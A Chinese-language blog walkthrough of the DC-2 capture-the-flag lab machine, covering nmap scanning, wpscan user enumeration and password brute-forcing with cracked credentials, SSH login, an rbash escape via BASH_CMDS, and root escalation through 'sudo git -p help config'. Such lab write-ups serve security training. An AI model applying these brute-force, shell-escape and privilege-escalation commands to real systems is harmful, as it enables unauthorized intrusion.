DC-2打靶渗透

一、信息收集

1、查看靶机的MAC地址:

2、查看靶机的ip地址:

nmap 192.168.7.0/24

3、查看靶机开放的端口,开放了80和7744端口,发现80端口下面有提示http://dc-2/,怀疑需要配置hosts文件来解析:

nmap -p- -sC -sT -sV -A 192.168.7.57

4、访问靶机的80端口,发现确实需要修改:

5、修改hosts文件:

6、再次访问80端口:

7、查看页面发现有一个flag,点开之后里面有一个提示需要用到cewl:

8、先对网站进行目录扫描,查找有效信息:

dirsearch -u "http://dc-2"

9、拼接访问目录,查看网页,找到登录页面:

10、使用前面找到的cewl来生成一个字典:

cewl http://dc-2 -w passwd.txt


11、使用wpscan工具枚举用户名:

wpscan --url http://dc-2/ --enumerate u

12、使用用户名字典和密码字典进行爆破:

wpscan --url http://dc-2/ -U user.txt -P passwd.txt

jerry / adipiscing

tom / parturient

13、使用得到的账号和密码进行登录:

14、在pages里面找到了flag2,提示我们换一种思路:

15、之前端口扫描的时候发现ssh服务在7744端口,我们尝试进行ssh连接:

ssh tom@192.168.7.57 -p 7744

发现只有tom用户可以,jerry用户不行

16、查看用户权限发现权限有限,并且有限制'-rbash',可以明显看出来是rbash逃逸:

17、使用命令进行逃逸并查看flag.txt:

BASH_CMDS[a]=/bin/bash

a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

18、flag3.txt提示我们需要切换jerry用户,使用前面的账号和密码进行切换:

19、在用户下发现了第四个flag:

二、提权:

1、查看用户权限:

2、使用命令进行提权:

sudo git -p help config

!/bin/sh

3、在root下面找到第五个flag:

  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值